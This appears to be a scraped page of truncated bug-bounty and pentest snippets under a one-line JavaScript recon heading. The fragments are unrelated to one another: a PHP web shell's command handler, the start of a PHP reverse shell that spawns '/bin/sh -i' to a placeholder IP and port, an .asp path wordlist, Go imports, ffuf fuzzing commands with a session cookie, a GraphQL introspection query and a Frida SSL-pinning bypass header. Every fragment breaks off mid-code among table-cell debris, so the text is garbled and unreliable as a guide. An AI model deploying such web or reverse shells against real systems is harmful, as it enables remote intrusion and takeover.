This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
<?php | |
function featureShell($cmd, $cwd) { | |
$stdout = array(); | |
if (preg_match("/^\s*cd\s*$/", $cmd)) { | |
// pass | |
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { | |
chdir($cwd); | |
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); |
<?php | |
set_time_limit (0); | |
$VERSION = "1.0"; | |
$ip = 'IP'; // CHANGE THIS | |
$port = PORT; // CHANGE THIS | |
$chunk_size = 1400; | |
$write_a = null; | |
$error_a = null; | |
$shell = 'uname -a; w; id; /bin/sh -i'; | |
$daemon = 0; |
sound/pci/cs46xx/imgs/cwcdma.asp | |
sites/all/libraries/ckeditor/ckeditor.asp | |
sites/all/libraries/ckeditor/_samples/asp/events.asp | |
sites/all/libraries/ckeditor/_samples/asp/sample_posteddata.asp | |
sites/all/libraries/ckeditor/_samples/asp/standalone.asp | |
sites/all/libraries/ckeditor/_samples/asp/replaceall.asp | |
sites/all/libraries/ckeditor/_samples/asp/advanced.asp | |
sites/all/libraries/ckeditor/_samples/asp/replace.asp | |
src/main/webapp/static/my97datepicker/docs/demo/resource/main.asp | |
library/custom_template/ckeditor/_samples/asp/replaceall.asp |
package main | |
import ( | |
"bufio" | |
"flag" | |
"fmt" | |
"net" | |
"os" | |
"sync" | |
) |
# Basic Usage | |
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 | |
# Basic Usage With a Cookie | |
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 -b "laravel_session=eyJpdiI6Ii8wQU11dTVlUkg2alRHUXBIVzlGSnc9PSIsInZhbHVlIjoiOWs3YllJWTdqNC9xa1pMeFRvMFh0OE1vRFpaWm9GSzFkRktVZS9yUHBDM0lIazZ4K0NsbndxWVIxQ05VZWhqZUZaR0RGQWlFdmdDc24yWllYRklGSXI5STd2b05Pam4yRXIwV1BUWkZhUnFLNUFzOWsycmRHcnlxS0FqRWNsSnEiLCJtYWMiOiI3ZTliMmM2YzIxOTExNDE0NmVjYTYyMGI4Nzg4YzJiYjNmNjVkNDI1YzEyODYwMzY5YzczNzY3NTUwZDk0OGYzIn0%3D;" | |
# Adding a delay | |
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 –p 1 –t 3 | |
# Adding a delay (new method) |
query IntrospectionQuery { | |
__schema { | |
queryType { name } | |
mutationType { name } | |
subscriptionType { name } | |
types { | |
...FullType | |
} | |
directives { | |
name |
/* | |
Android SSL Re-pinning frida script v0.2 030417-pier | |
$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt | |
$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause | |
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/ | |
UPDATE 20191605: Fixed undeclared var. Thanks to @oleavr and @ehsanpc9999 ! | |
*/ |